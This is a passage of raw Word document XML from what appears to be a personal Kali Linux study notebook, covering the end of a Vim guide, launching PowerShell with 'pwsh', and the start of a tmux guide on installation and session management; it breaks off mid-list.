      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> followed by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">h/j/k/l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BD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DC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BDD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Customization (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BDE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.vimrc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file in your home directory for custom settings. Example:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> set number       " Show line numbers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BDF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set tabstop=4    " Set tab width</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BE0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set expandtab    " Use spaces instead of tabs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="434"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BE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E3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BE4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Practice Resources</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BE5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vimtutor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vimtutor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in your terminal) to practice interactively.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BE6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try out HackTheBox challenges and note commands you see frequently.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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E8">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This guide provides the essentials without being overwhelming. Practice each section gradually to build confidence with VIM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BE9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BE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EB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_q0f71ihxfyyj" w:id="549"/>
      <w:bookmarkEnd w:id="549"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to switch from terminal to powershell in Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BEC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BED">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pwsh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BEE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BE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F0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BF1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_l5nfhs1l782m" w:id="550"/>
      <w:bookmarkEnd w:id="550"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BF2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BF3">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive Guide to Using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BF4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pP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(terminal multiplexer) is a powerful tool for managing multiple terminal sessions within a single window. It's especially useful for developers, sysadmins, and anyone who works extensively in the terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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F6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BF7">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Installation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BF8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1455"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Debian/Ubuntu</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sudo apt install tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1455"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Red Hat/CentOS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sudo yum install tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1455"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">macOS</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brew install tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1455"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows</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via WSL (Windows Subsystem for Linux).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BF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BFD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BFE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Starting and Attaching Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start a new session</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C00">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1292"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This creates a new session and opens a </w:t>
      </w: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window.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C01">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start a new session with a name</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tmux new -s my_session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="570"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"-s" stands for session name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C03">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C04">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">List all sessions</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tmux ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C05">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C06">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reattach to a session</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tmux attach -t my_session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"-t" stands for target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="310"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detach from a session</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Press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followed by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">d</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C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0B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C0C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Basic Concepts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1195"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Session</w:t>
      </w:r>
